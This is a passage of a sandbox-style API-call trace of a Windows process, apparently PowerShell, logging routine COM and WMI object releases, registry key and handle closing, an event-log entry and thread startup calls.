dwEventID=0x193, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2eca598*="Stopped", lpRawData=0x2eca328) returned 1 [0135.803] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1 [0135.806] CoGetContextToken (in: pToken=0x1af150 | out: pToken=0x1af150) returned 0x0 [0135.806] IUnknown:QueryInterface (in: This=0x212480, riid=0x7fef2a9d270*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1af1a8 | out: ppvObject=0x1af1a8*=0x212498) returned 0x0 [0135.806] IComThreadingInfo:GetCurrentThreadType (in: This=0x212498, pThreadType=0x1af2a0 | out: pThreadType=0x1af2a0*=0) returned 0x0 [0135.806] IUnknown:Release (This=0x212498) returned 0x1 [0135.807] CoGetContextToken (in: pToken=0x1aed20 | out: pToken=0x1aed20) returned 0x0 [0135.808] IUnknown:QueryInterface (in: This=0x212480, riid=0x7fef2a9d270*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1aed78 | out: ppvObject=0x1aed78*=0x212498) returned 0x0 [0135.808] IComThreadingInfo:GetCurrentThreadType (in: This=0x212498, pThreadType=0x1aee10 | out: pThreadType=0x1aee10*=0) returned 0x0 [0135.808] IUnknown:Release (This=0x212498) returned 0x1 [0135.811] CoGetContextToken (in: pToken=0x1aed20 | out: pToken=0x1aed20) returned 0x0 [0135.811] IUnknown:QueryInterface (in: This=0x212480, riid=0x7fef2a9d270*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1aed78 | out: ppvObject=0x1aed78*=0x212498) returned 0x0 [0135.811] IComThreadingInfo:GetCurrentThreadType (in: This=0x212498, pThreadType=0x1aee10 | out: pThreadType=0x1aee10*=0) returned 0x0 [0135.811] IUnknown:Release (This=0x212498) returned 0x1 [0135.821] CoGetContextToken (in: pToken=0x1aed20 | out: pToken=0x1aed20) returned 0x0 [0135.821] IUnknown:QueryInterface (in: This=0x212480, riid=0x7fef2a9d270*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1aed78 | out: ppvObject=0x1aed78*=0x212498) returned 0x0 [0135.821] IComThreadingInfo:GetCurrentThreadType (in: This=0x212498, pThreadType=0x1aee10 | out: pThreadType=0x1aee10*=0) returned 0x0 [0135.821] IUnknown:Release (This=0x212498) returned 0x1 [0135.862] CoGetContextToken (in: pToken=0x1aed10 | out: pToken=0x1aed10) returned 0x0 [0135.862] IUnknown:QueryInterface (in: This=0x212480, riid=0x7fef2a9d270*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1aed68 | out: ppvObject=0x1aed68*=0x212498) returned 0x0 [0135.863] IComThreadingInfo:GetCurrentThreadType (in: This=0x212498, pThreadType=0x1aee00 | out: pThreadType=0x1aee00*=0) returned 0x0 [0135.863] IUnknown:Release (This=0x212498) returned 0x1 [0135.871] CoUninitialize () Thread: id = 77 os_tid = 0x620 Thread: id = 78 os_tid = 0x980 Thread: id = 79 os_tid = 0x910 Thread: id = 80 os_tid = 0x950 Thread: id = 81 os_tid = 0xa10 [0097.767] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0102.928] RegCloseKey (hKey=0x330) returned 0x0 [0102.928] LocalFree (hMem=0x23aa90) returned 0x0 [0102.929] CloseHandle (hObject=0x320) returned 1 [0102.929] CloseHandle (hObject=0x13) returned 1 [0102.929] CloseHandle (hObject=0xf) returned 1 [0102.930] RegCloseKey (hKey=0x30c) returned 0x0 [0102.930] RegCloseKey (hKey=0x308) returned 0x0 [0102.930] RegCloseKey (hKey=0x304) returned 0x0 [0102.930] LocalFree (hMem=0x23aa60) returned 0x0 [0105.149] RegCloseKey (hKey=0x3b0) returned 0x0 [0105.150] RegCloseKey (hKey=0x378) returned 0x0 [0105.150] RegCloseKey (hKey=0x374) returned 0x0 [0105.150] RegCloseKey (hKey=0x370) returned 0x0 [0105.150] RegCloseKey (hKey=0x36c) returned 0x0 [0105.151] RegCloseKey (hKey=0x368) returned 0x0 [0105.151] RegCloseKey (hKey=0x364) returned 0x0 [0105.151] RegCloseKey (hKey=0x360) returned 0x0 [0105.151] RegCloseKey (hKey=0x35c) returned 0x0 [0105.151] RegCloseKey (hKey=0x3ac) returned 0x0 [0105.152] RegCloseKey (hKey=0x34c) returned 0x0 [0105.152] RegCloseKey (hKey=0x348) returned 0x0 [0105.152] RegCloseKey (hKey=0x344) returned 0x0 [0105.152] RegCloseKey (hKey=0x340) returned 0x0 [0105.153] RegCloseKey (hKey=0x33c) returned 0x0 [0105.153] RegCloseKey (hKey=0x338) returned 0x0 [0105.153] RegCloseKey (hKey=0x334) returned 0x0 [0105.153] RegCloseKey (hKey=0x330) returned 0x0 [0105.154] RegCloseKey (hKey=0x3a8) returned 0x0 [0105.154] RegCloseKey (hKey=0x30c) returned 0x0 [0105.154] RegCloseKey (hKey=0x308) returned 0x0 [0105.154] RegCloseKey (hKey=0x3a4) returned 0x0 [0105.154] RegCloseKey (hKey=0x3a0) returned 0x0 [0105.155] RegCloseKey (hKey=0x37c) returned 0x0 [0105.155] RegCloseKey (hKey=0x3b8) returned 0x0 [0105.155] RegCloseKey (hKey=0x398) returned 0x0 [0105.155] RegCloseKey (hKey=0x394) returned 0x0 [0105.155] RegCloseKey (hKey=0x390) returned 0x0 [0105.156] RegCloseKey (hKey=0x38c) returned 0x0 [0105.156] RegCloseKey (hKey=0x388) returned 0x0 [0105.156] RegCloseKey (hKey=0x384) returned 0x0 [0105.156] RegCloseKey (hKey=0x380) returned 0x0 [0105.157] RegCloseKey (hKey=0x358) returned 0x0 [0105.157] RegCloseKey (hKey=0x3b4) returned 0x0 [0105.157] RegCloseKey (hKey=0x304) returned 0x0 [0131.796] CoGetContextToken (in: pToken=0x274f390 | out: pToken=0x274f390) returned 0x0 [0131.797] CoGetContextToken (in: pToken=0x274f2b0 | out: pToken=0x274f2b0) returned 0x0 [0131.797] WbemLocator:IUnknown:Release (This=0x1c8f16b0) returned 0x0 [0131.797] CoGetContextToken (in: pToken=0x274f2b0 | out: pToken=0x274f2b0) returned 0x0 [0131.797] IUnknown:Release (This=0x1c8f4830) returned 0x1 [0131.797] CoGetContextToken (in: pToken=0x274f2b0 | out: pToken=0x274f2b0) returned 0x0 [0131.797] WbemStatusCodeText:IUnknown:Release (This=0x1c8f17e0) returned 0x1 [0131.797] WbemStatusCodeText:IUnknown:Release (This=0x1c8f17e0) returned 0x0 [0131.797] CoGetContextToken (in: pToken=0x274f2b0 | out: pToken=0x274f2b0) returned 0x0 [0131.797] WbemDefPath:IUnknown:Release (This=0x1c8f6dc0) returned 0x1 [0131.797] WbemDefPath:IUnknown:Release (This=0x1c8f6dc0) returned 0x0 [0131.797] CoGetContextToken (in: pToken=0x274f2b0 | out: pToken=0x274f2b0) returned 0x0 [0131.797] WbemDefPath:IUnknown:Release (This=0x1c8f6ec0) returned 0x1 [0131.798] WbemDefPath:IUnknown:Release (This=0x1c8f6ec0) returned 0x0 [0131.798] CoGetContextToken (in: pToken=0x274f2b0 | out: pToken=0x274f2b0) returned 0x0 [0131.798] WbemDefPath:IUnknown:Release (This=0x1c8f4ae0) returned 0x1 [0131.798] WbemDefPath:IUnknown:Release (This=0x1c8f4ae0) returned 0x0 [0131.798] CoGetContextToken (in: pToken=0x274f2b0 | out: pToken=0x274f2b0) returned 0x0 [0131.798] WbemDefPath:IUnknown:Release (This=0x1c8f4ed0) returned 0x1 [0131.798] WbemDefPath:IUnknown:Release (This=0x1c8f4ed0) returned 0x0 [0131.798] CoGetContextToken (in: pToken=0x274f2b0 | out: pToken=0x274f2b0) returned 0x0 [0131.798] WbemDefPath:IUnknown:Release (This=0x1c8f4fd0) returned 0x1 [0131.798] WbemDefPath:IUnknown:Release (This=0x1c8f4fd0) returned 0x0 [0131.798] CoGetContextToken (in: pToken=0x274f2b0 | out: pToken=0x274f2b0) returned 0x0 [0131.798] WbemDefPath:IUnknown:Release (This=0x1c8f50d0) returned 0x1 [0131.798] WbemDefPath:IUnknown:Release (This=0x1c8f50d0) returned 0x0 [0131.799] CoGetContextToken (in: pToken=0x274f2b0 | out: pToken=0x274f2b0) returned 0x0 [0131.799] WbemDefPath:IUnknown:Release (This=0x1c8f53a0) returned 0x1 [0131.799] WbemDefPath:IUnknown:Release (This=0x1c8f53a0) returned 0x0 [0131.799] CoGetContextToken (in: pToken=0x274f2b0 | out: pToken=0x274f2b0) returned 0x0 [0131.799] WbemDefPath:IUnknown:Release (This=0x1c8f9030) returned 0x1 [0131.799] WbemDefPath:IUnknown:Release (This=0x1c8f9030) returned 0x0 [0131.799] CoGetContextToken (in: pToken=0x274f2b0 | out: pToken=0x274f2b0) returned 0x0 [0131.799] WbemDefPath:IUnknown:Release (This=0x1c8f90f0) returned 0x1 [0131.799] WbemDefPath:IUnknown:Release (This=0x1c8f90f0) returned 0x0 [0131.799] CoGetContextToken (in: pToken=0x274f2b0 | out: pToken=0x274f2b0) returned 0x0 [0131.799] WbemDefPath:IUnknown:Release (This=0x1c8f91b0) returned 0x1 [0131.799] WbemDefPath:IUnknown:Release (This=0x1c8f91b0) returned 0x0 [0131.800] CoGetContextToken (in: pToken=0x274f2b0 | out: pToken=0x274f2b0) returned 0x0 [0131.800] WbemStatusCodeText:IUnknown:Release (This=0x1c8f1d60) returned 0x1 [0131.800] WbemStatusCodeText:IUnknown:Release (This=0x1c8f1d60) returned 0x0 [0131.800] CoGetContextToken (in: pToken=0x274f2b0 | out: pToken=0x274f2b0) returned 0x0 [0131.800] IUnknown:Release (This=0x1c900d50) returned 0x1 [0131.800] CoGetContextToken (in: pToken=0x274f2b0 | out: pToken=0x274f2b0) returned 0x0 [0131.800] IUnknown:Release (This=0x1c9014d0) returned 0x1 [0131.800] CoGetContextToken (in: pToken=0x274f2b0 | out: pToken=0x274f2b0) returned 0x0 [0131.800] IUnknown:Release (This=0x1c902450) returned 0x1 [0131.800] CoGetContextToken (in: pToken=0x274f2b0 | out: pToken=0x274f2b0) returned 0x0 [0131.800] IUnknown:Release (This=0x1c904ef0) returned 0x1 [0131.800] CoGetContextToken (in: pToken=0x274f2b0 | out: pToken=0x274f2b0) returned 0x0 [0131.801] IUnknown:Release (This=0x1c905590) returned 0x1 [0131.801] CoGetContextToken (in: pToken=0x274f2b0 | out: pToken=0x274f2b0) returned 0x0 [0131.801] IUnknown:Release (This=0x1c905c30) returned 0x1 [0131.801] CoGetContextToken (in: pToken=0x274f2b0 | out: pToken=0x274f2b0) returned 0x0 [0131.801] IUnknown:Release (This=0x1c9062d0) returned 0x1 [0131.801] CoGetContextToken (in: pToken=0x274f2b0 | out: pToken=0x274f2b0) returned 0x0 [0131.801] IUnknown:Release (This=0x1c906970) returned 0x1 [0131.801] CoGetContextToken (in: pToken=0x274f2b0 | out: pToken=0x274f2b0) returned 0x0 [0131.801] IUnknown:Release (This=0x1c907010) returned 0x1 [0131.801] CoGetContextToken (in: pToken=0x274f2b0 | out: pToken=0x274f2b0) returned 0x0 [0131.801] IUnknown:Release (This=0x1c9076c0) returned 0x1 [0131.801] CoGetContextToken (in: pToken=0x274f2b0 | out: pToken=0x274f2b0) returned 0x0 [0131.801] IUnknown:Release (This=0x1c907d70) returned 0x1 [0131.802] CoGetContextToken (in: pToken=0x274f2b0 | out: pToken=0x274f2b0) returned 0x0 [0131.802] IUnknown:Release (This=0x1c908420) returned 0x1 [0131.802] CoGetContextToken (in: pToken=0x274f2b0 | out: pToken=0x274f2b0) returned 0x0 [0131.802] IUnknown:Release (This=0x1c909a70) returned 0x1 [0131.802] CoGetContextToken (in: pToken=0x274f2b0 | out: pToken=0x274f2b0) returned 0x0 [0131.802] IUnknown:Release (This=0x1c90a8c0) returned 0x1 [0131.802] CoGetContextToken (in: pToken=0x274f2b0 | out: pToken=0x274f2b0) returned 0x0 [0131.802] IUnknown:Release (This=0x1c90af10) returned 0x1 [0131.802] CoGetContextToken (in: pToken=0x274f2b0 | out: pToken=0x274f2b0) returned 0x0 [0131.802] IUnknown:Release (This=0x1c90ff20) returned 0x1 [0131.802] CoGetContextToken (in: pToken=0x274f2b0 | out: pToken=0x274f2b0) returned 0x0 [0131.802] IUnknown:Release (This=0x1c9101d0) returned 0x1 [0131.804] IUnknown:Release (This=0x1c90a8c0) returned 0x0 [0131.804] IUnknown:Release (This=0x1c909a70) returned 0x0 [0131.804] IUnknown:Release (This=0x1c908420) returned 0x0 [0131.805] IUnknown:Release (This=0x1c907d70) returned 0x0 [0131.805] IUnknown:Release (This=0x1c9076c0) returned 0x0 [0131.805] IUnknown:Release (This=0x1c907010) returned 0x0 [0131.805] IUnknown:Release (This=0x1c906970) returned 0x0 [0131.805] IUnknown:Release (This=0x1c9062d0) returned 0x0 [0131.805] IUnknown:Release (This=0x1c905c30) returned 0x0 [0131.806] IUnknown:Release (This=0x1c905590) returned 0x0 [0131.806] IUnknown:Release (This=0x1c904ef0) returned 0x0 [0131.806] IUnknown:Release (This=0x1c902450) returned 0x0 [0131.806] IUnknown:Release (This=0x1c9014d0) returned 0x0 [0131.806] IUnknown:Release (This=0x1c900d50) returned 0x0 [0131.806] IUnknown:Release (This=0x1c9009e0) returned 0x0 [0131.806] IUnknown:Release (This=0x1c9004e0) returned 0x0 [0131.807] IUnknown:Release (This=0x1c900240) returned 0x0 [0131.807] IUnknown:Release (This=0x1c9001c0) returned 0x0 [0131.807] IUnknown:Release (This=0x1c8ffe50) returned 0x0 [0131.807] IUnknown:Release (This=0x1c8ff950) returned 0x0 [0131.807] IUnknown:Release (This=0x1c8ff6b0) returned 0x0 [0131.807] IUnknown:Release (This=0x1c8ff630) returned 0x0 [0131.808] IUnknown:Release (This=0x1c8ff2c0) returned 0x0 [0131.808] IUnknown:Release (This=0x1c8fedc0) returned 0x0 [0131.808] IUnknown:Release (This=0x1c8feb00) returned 0x0 [0131.808] IUnknown:Release (This=0x1c8fe790) returned 0x0 [0131.808] IUnknown:Release (This=0x1c8fe290) returned 0x0 [0131.808] IUnknown:Release (This=0x1c8fdfd0) returned 0x0 [0131.808] IUnknown:Release (This=0x1c8f9730) returned 0x0 [0131.808] IUnknown:Release (This=0x1c8fdc50) returned 0x0 [0131.809] IUnknown:Release (This=0x1c8fd5e0) returned 0x0 [0131.809] IUnknown:Release (This=0x1c8fcfd0) returned 0x0 [0131.809] IUnknown:Release (This=0x1c8fcac0) returned 0x0 [0131.809] IUnknown:Release (This=0x1c8fc750) returned 0x0 [0131.809] IUnknown:Release (This=0x1c8fc0e0) returned 0x0 [0131.809] IUnknown:Release (This=0x1c8f5460) returned 0x0 [0131.809] IUnknown:Release (This=0x1c8f4830) returned 0x0 [0131.810] IUnknown:Release (This=0x1c90ff20) returned 0x0 [0131.810] IUnknown:Release (This=0x1c90af10) returned 0x0 [0131.810] RegCloseKey (hKey=0x3a4) returned 0x0 [0135.810] LocalFree (hMem=0x1b7403e0) returned 0x0 [0135.811] LocalFree (hMem=0x1b7402d0) returned 0x0 [0135.813] IUnknown:Release (This=0x1c910c90) returned 0x1 [0135.814] IUnknown:Release (This=0x1c9109e0) returned 0x1 [0135.815] IUnknown:Release (This=0x1c910730) returned 0x1 [0135.816] IUnknown:Release (This=0x1c910480) returned 0x1 [0135.816] IUnknown:Release (This=0x1c90ff20) returned 0x1 [0135.821] DeregisterEventSource (hEventLog=0x1b840008) returned 1 [0135.822] CoGetContextToken (in: pToken=0x274f200 | out: pToken=0x274f200) returned 0x0 [0135.823] WbemLocator:IUnknown:Release (This=0x1b7974a0) returned 0x1 [0135.823] IUnknown:Release (This=0x1c8f45f8) returned 0x0 [0135.835] IUnknown:Release (This=0x1c9101d0) returned 0x0 [0135.845] CloseHandle (hObject=0x338) returned 1 [0135.845] CloseHandle (hObject=0x3e4) returned 1 [0135.846] CloseHandle (hObject=0x1cc) returned 1 [0135.846] CloseHandle (hObject=0x1d0) returned 1 [0135.846] CloseHandle (hObject=0x3a4) returned 1 [0135.846] CloseHandle (hObject=0x48c) returned 1 [0135.847] CloseHandle (hObject=0x3d8) returned 1 [0135.847] CloseHandle (hObject=0x344) returned 1 [0135.847] CloseHandle (hObject=0x340) returned 1 [0135.847] CloseHandle (hObject=0x3a0) returned 1 [0135.848] CloseHandle (hObject=0x33c) returned 1 [0135.848] CloseHandle (hObject=0x37c) returned 1 [0135.848] CloseHandle (hObject=0x3b8) returned 1 [0135.848] CloseHandle (hObject=0x398) returned 1 [0135.849] CloseHandle (hObject=0x394) returned 1 [0135.849] CloseHandle (hObject=0x390) returned 1 [0135.849] CloseHandle (hObject=0x38c) returned 1 [0135.849] CloseHandle (hObject=0x388) returned 1 [0135.849] CloseHandle (hObject=0x384) returned 1 [0135.850] CloseHandle (hObject=0x380) returned 1 [0135.850] CloseHandle (hObject=0x358) returned 1 [0135.850] CloseHandle (hObject=0x3b4) returned 1 [0135.850] CloseHandle (hObject=0x304) returned 1 [0135.851] UnmapViewOfFile (lpBaseAddress=0x2ad0000) returned 1 [0135.851] RegCloseKey (hKey=0x3f0) returned 0x0 [0135.852] CloseHandle (hObject=0x32c) returned 1 [0135.852] CloseHandle (hObject=0x3f4) returned 1 [0135.852] CloseHandle (hObject=0x3f8) returned 1 [0135.852] RegCloseKey (hKey=0xffffffff80000004) returned 0x0 [0135.853] CloseHandle (hObject=0x454) returned 1 [0135.853] CloseHandle (hObject=0x2ec) returned 1 [0135.853] CloseHandle (hObject=0x324) returned 1 [0135.854] CloseHandle (hObject=0x3e8) returned 1 [0135.856] CoGetContextToken (in: pToken=0x274c7f0 | out: pToken=0x274c7f0) returned 0x0 [0135.856] CoGetContextToken (in: pToken=0x274c710 | out: pToken=0x274c710) returned 0x0 [0135.856] WbemDefPath:IUnknown:Release (This=0x1c903310) returned 0x1 [0135.857] WbemDefPath:IUnknown:Release (This=0x1c903310) returned 0x0 [0135.857] CoGetContextToken (in: pToken=0x274c710 | out: pToken=0x274c710) returned 0x0 [0135.857] IUnknown:Release (This=0x1c90ff20) returned 0x0 [0135.857] CoGetContextToken (in: pToken=0x274c710 | out: pToken=0x274c710) returned 0x0 [0135.857] WbemDefPath:IUnknown:Release (This=0x1c902dd0) returned 0x1 [0135.857] WbemDefPath:IUnknown:Release (This=0x1c902dd0) returned 0x0 [0135.857] CoGetContextToken (in: pToken=0x274c710 | out: pToken=0x274c710) returned 0x0 [0135.857] IUnknown:Release (This=0x1c910730) returned 0x0 [0135.858] CoGetContextToken (in: pToken=0x274c710 | out: pToken=0x274c710) returned 0x0 [0135.858] WbemDefPath:IUnknown:Release (This=0x1c903550) returned 0x1 [0135.858] WbemDefPath:IUnknown:Release (This=0x1c903550) returned 0x0 [0135.858] CoGetContextToken (in: pToken=0x274c710 | out: pToken=0x274c710) returned 0x0 [0135.858] WbemDefPath:IUnknown:Release (This=0x1c8e1390) returned 0x1 [0135.858] WbemDefPath:IUnknown:Release (This=0x1c8e1390) returned 0x0 [0135.858] CoGetContextToken (in: pToken=0x274c710 | out: pToken=0x274c710) returned 0x0 [0135.858] WbemDefPath:IUnknown:Release (This=0x1c903010) returned 0x1 [0135.858] WbemDefPath:IUnknown:Release (This=0x1c903010) returned 0x0 [0135.859] CoGetContextToken (in: pToken=0x274c710 | out: pToken=0x274c710) returned 0x0 [0135.859] WbemDefPath:IUnknown:Release (This=0x1c903790) returned 0x1 [0135.859] WbemDefPath:IUnknown:Release (This=0x1c903790) returned 0x0 [0135.859] CoGetContextToken (in: pToken=0x274c710 | out: pToken=0x274c710) returned 0x0 [0135.859] WbemDefPath:IUnknown:Release (This=0x1c8f57d0) returned 0x1 [0135.859] WbemDefPath:IUnknown:Release (This=0x1c8f57d0) returned 0x0 [0135.859] CoGetContextToken (in: pToken=0x274c710 | out: pToken=0x274c710) returned 0x0 [0135.859] WbemDefPath:IUnknown:Release (This=0x1c902ad0) returned 0x1 [0135.859] WbemDefPath:IUnknown:Release (This=0x1c902ad0) returned 0x0 [0135.860] CoGetContextToken (in: pToken=0x274c710 | out: pToken=0x274c710) returned 0x0 [0135.860] WbemDefPath:IUnknown:Release (This=0x1c903250) returned 0x1 [0135.860] WbemDefPath:IUnknown:Release (This=0x1c903250) returned 0x0 [0135.860] CoGetContextToken (in: pToken=0x274c710 | out: pToken=0x274c710) returned 0x0 [0135.860] WbemDefPath:IUnknown:Release (This=0x1c902d10) returned 0x1 [0135.860] WbemDefPath:IUnknown:Release (This=0x1c902d10) returned 0x0 [0135.860] CoGetContextToken (in: pToken=0x274c710 | out: pToken=0x274c710) returned 0x0 [0135.860] WbemDefPath:IUnknown:Release (This=0x1c8e1490) returned 0x1 [0135.860] WbemDefPath:IUnknown:Release (This=0x1c8e1490) returned 0x0 [0135.861] CoGetContextToken (in: pToken=0x274c710 | out: pToken=0x274c710) returned 0x0 [0135.861] WbemDefPath:IUnknown:Release (This=0x1c903490) returned 0x1 [0135.861] WbemDefPath:IUnknown:Release (This=0x1c903490) returned 0x0 [0135.861] CoGetContextToken (in: pToken=0x274c710 | out: pToken=0x274c710) returned 0x0 [0135.861] IUnknown:Release (This=0x1c9109e0) returned 0x0 [0135.861] CoGetContextToken (in: pToken=0x274c710 | out: pToken=0x274c710) returned 0x0 [0135.861] WbemDefPath:IUnknown:Release (This=0x1c902f50) returned 0x1 [0135.861] WbemDefPath:IUnknown:Release (This=0x1c902f50) returned 0x0 [0135.862] CoGetContextToken (in: pToken=0x274c710 | out: pToken=0x274c710) returned 0x0 [0135.862] WbemDefPath:IUnknown:Release (This=0x1c9036d0) returned 0x1 [0135.862] WbemDefPath:IUnknown:Release (This=0x1c9036d0) returned 0x0 [0135.862] CoGetContextToken (in: pToken=0x274c710 | out: pToken=0x274c710) returned 0x0 [0135.862] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x1 [0135.862] WbemLocator:IUnknown:Release (This=0x1c8f44f8) returned 0x0 [0135.863] CoGetContextToken (in: pToken=0x274c710 | out: pToken=0x274c710) returned 0x0 [0135.863] WbemDefPath:IUnknown:Release (This=0x1c902a10) returned 0x1 [0135.863] WbemDefPath:IUnknown:Release (This=0x1c902a10) returned 0x0 [0135.864] CoGetContextToken (in: pToken=0x274c710 | out: pToken=0x274c710) returned 0x0 [0135.864] WbemDefPath:IUnknown:Release (This=0x1c903190) returned 0x1 [0135.864] WbemDefPath:IUnknown:Release (This=0x1c903190) returned 0x0 [0135.864] CoGetContextToken (in: pToken=0x274c710 | out: pToken=0x274c710) returned 0x0 [0135.864] WbemDefPath:IUnknown:Release (This=0x1c902c50) returned 0x1 [0135.864] WbemDefPath:IUnknown:Release (This=0x1c902c50) returned 0x0 [0135.864] CoGetContextToken (in: pToken=0x274c710 | out: pToken=0x274c710) returned 0x0 [0135.864] WbemDefPath:IUnknown:Release (This=0x1c9012e0) returned 0x1 [0135.865] WbemDefPath:IUnknown:Release (This=0x1c9012e0) returned 0x0 [0135.865] CoGetContextToken (in: pToken=0x274c710 | out: pToken=0x274c710) returned 0x0 [0135.865] WbemDefPath:IUnknown:Release (This=0x1c9033d0) returned 0x1 [0135.865] WbemDefPath:IUnknown:Release (This=0x1c9033d0) returned 0x0 [0135.865] CoGetContextToken (in: pToken=0x274c710 | out: pToken=0x274c710) returned 0x0 [0135.865] WbemDefPath:IUnknown:Release (This=0x1c901a60) returned 0x1 [0135.865] WbemDefPath:IUnknown:Release (This=0x1c901a60) returned 0x0 [0135.865] CoGetContextToken (in: pToken=0x274c710 | out: pToken=0x274c710) returned 0x0 [0135.866] IUnknown:Release (This=0x1c910480) returned 0x0 [0135.866] CoGetContextToken (in: pToken=0x274c710 | out: pToken=0x274c710) returned 0x0 [0135.866] WbemDefPath:IUnknown:Release (This=0x1c902e90) returned 0x1 [0135.866] WbemDefPath:IUnknown:Release (This=0x1c902e90) returned 0x0 [0135.866] CoGetContextToken (in: pToken=0x274c710 | out: pToken=0x274c710) returned 0x0 [0135.866] IUnknown:Release (This=0x1c910c90) returned 0x0 [0135.866] CoGetContextToken (in: pToken=0x274c710 | out: pToken=0x274c710) returned 0x0 [0135.866] WbemDefPath:IUnknown:Release (This=0x1c8f6a00) returned 0x1 [0135.866] WbemDefPath:IUnknown:Release (This=0x1c8f6a00) returned 0x0 [0135.867] CoGetContextToken (in: pToken=0x274c710 | out: pToken=0x274c710) returned 0x0 [0135.867] WbemDefPath:IUnknown:Release (This=0x1c903610) returned 0x1 [0135.867] WbemDefPath:IUnknown:Release (This=0x1c903610) returned 0x0 [0135.867] CoGetContextToken (in: pToken=0x274c710 | out: pToken=0x274c710) returned 0x0 [0135.867] WbemDefPath:IUnknown:Release (This=0x1c9030d0) returned 0x1 [0135.867] WbemDefPath:IUnknown:Release (This=0x1c9030d0) returned 0x0 [0135.867] CoGetContextToken (in: pToken=0x274c710 | out: pToken=0x274c710) returned 0x0 [0135.867] WbemDefPath:IUnknown:Release (This=0x1c903850) returned 0x1 [0135.868] WbemDefPath:IUnknown:Release (This=0x1c903850) returned 0x0 [0135.868] CoGetContextToken (in: pToken=0x274c710 | out: pToken=0x274c710) returned 0x0 [0135.868] WbemDefPath:IUnknown:Release (This=0x1c902b90) returned 0x1 [0135.868] IUnknown:Release (This=0x212480) returned 0x0 [0135.868] WbemDefPath:IUnknown:Release (This=0x1c902b90) returned 0x0 Thread: id = 82 os_tid = 0x940 [0105.285] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0105.289] SetThreadUILanguage (LangId=0x0) returned 0x7fffffa0409 [0105.294] CoTaskMemAlloc (cb=0x104) returned 0x1b7404f0 [0105.294] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7404f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0105.294] CoTaskMemFree (pv=0x1b7404f0) [0105.296] VirtualQuery (in: lpAddress=0x1c64d7e0, lpBuffer=0x1c64e6a0, dwLength=0x30 | out: lpBuffer=0x1c64e6a0*(BaseAddress=0x1c64d000, AllocationBase=0x1bcc0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.302] CoTaskMemAlloc (cb=0x104) returned 0x1b7404f0 [0105.302] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7404f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0105.302] CoTaskMemFree (pv=0x1b7404f0) [0105.305] CoTaskMemAlloc (cb=0x104) returned 0x1b7404f0 [0105.305] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7404f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0105.305] CoTaskMemFree (pv=0x1b7404f0) [0105.308] CoTaskMemAlloc (cb=0x104) returned 0x1b7404f0 [0105.308] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7404f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0105.308] CoTaskMemFree (pv=0x1b7404f0) [0105.317] CoTaskMemAlloc (cb=0x104) returned 0x1b7404f0 [0105.317] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7404f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0105.317] CoTaskMemFree (pv=0x1b7404f0) [0105.319] CoTaskMemAlloc (cb=0x104) returned 0x1b7404f0 [0105.319] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7404f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0105.319] CoTaskMemFree (pv=0x1b7404f0) [0105.320] CoTaskMemAlloc (cb=0x104) returned 0x1b7404f0 [0105.320] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7404f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0105.321] CoTaskMemFree (pv=0x1b7404f0) [0105.325] VirtualQuery (in: lpAddress=0x1c64da90, lpBuffer=0x1c64e950, dwLength=0x30 | out: lpBuffer=0x1c64e950*(BaseAddress=0x1c64d000, AllocationBase=0x1bcc0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.326] CoTaskMemAlloc (cb=0x104) returned 0x1b7404f0 [0105.326] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7404f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0105.326] CoTaskMemFree (pv=0x1b7404f0) [0105.328] CoTaskMemAlloc (cb=0x104) returned 0x1b7404f0 [0105.328] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7404f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0105.328] CoTaskMemFree (pv=0x1b7404f0) [0105.329] CoTaskMemAlloc (cb=0x104) returned 0x1b7404f0 [0105.329] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7404f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0105.329] CoTaskMemFree (pv=0x1b7404f0) [0105.331] CoTaskMemAlloc (cb=0x104) returned 0x1b7404f0 [0105.332] 